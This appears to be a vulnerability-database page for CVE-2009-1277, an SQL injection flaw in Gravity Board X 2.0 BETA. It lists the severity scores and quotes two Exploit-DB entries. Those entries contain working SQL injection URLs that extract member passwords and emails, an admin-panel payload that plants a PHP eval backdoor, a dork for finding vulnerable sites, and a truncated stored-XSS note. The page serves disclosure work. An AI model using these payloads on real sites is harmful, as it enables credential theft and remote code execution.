CVE-2009-1277
Published 2009-04-09
CVE-2009-1277: SQL injection vulnerability in index.php in Gravity Board X (GBX) 2.0 BETA allows remote attackers to execute arbitrary SQL commands via the member_id…
Priority: P339, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.6th percentile)
SQL injection vulnerability in index.php in Gravity Board X (GBX) 2.0 BETA allows remote attackers to execute arbitrary SQL commands via the member_id parameter in a viewprofile action. NOTE: the board_id issue is already covered by CVE-2008-2996.2.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gravityboardx | gravity_board_x | — | — |
No detection rules found.
Exploit-DB
Gravity Board X 2.0 Beta - SQL Injection / (Authenticated) Code Execution
exploitdb·2009-04-03
CVE-2009-1278 Gravity Board X 2.0 Beta - SQL Injection / (Authenticated) Code Execution
---
Found : brain[pillow]
Dork : "Powered By Gravity Board X v2.0 BETA"
Visit : brainpillow.cc, forum.antichat.ru, raz0r.name
Mail : [email protected]
SQL-injections:
/index.php?action=viewprofile&member_id=slider-loleg'+union+select+concat_ws(char(58),displayname,pw,email)+from+gbx_members+where+1='1
/index.php?action=viewboard&board_id=m0nzt3r-loleg-too'+union+select+0,concat_ws(char(58),displayname,pw,email),2+from+gbx_members+where+1='1
Code exec (in admin panel):
Go: /index.php?action=configure
Enter Board Name: xXx";if(isset($_GET[c]))eval($_GET[c]);#
Go: /index.php?ok=phpinfo();
# milw0rm.com [2009-04-03]
Exploit-DB
Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting
exploitdb·2008-06-12
CVE-2009-1277 Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting
---
Gravity Board X 2.0 Beta (SQL/XSS) Multiple Remote Vulnerabilities
AUTHOR : CWH Underground
DATE : 12 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : Gravity Board X
VERSION : 2.0 Beta
DOWNLOAD : http://downloads.sourceforge.net/gbx
#####################################################
+++ Remote Stored XSS Exploit +++
When you create new thread in forum, you can inject javascript in title fie
No writeups or analysis indexed.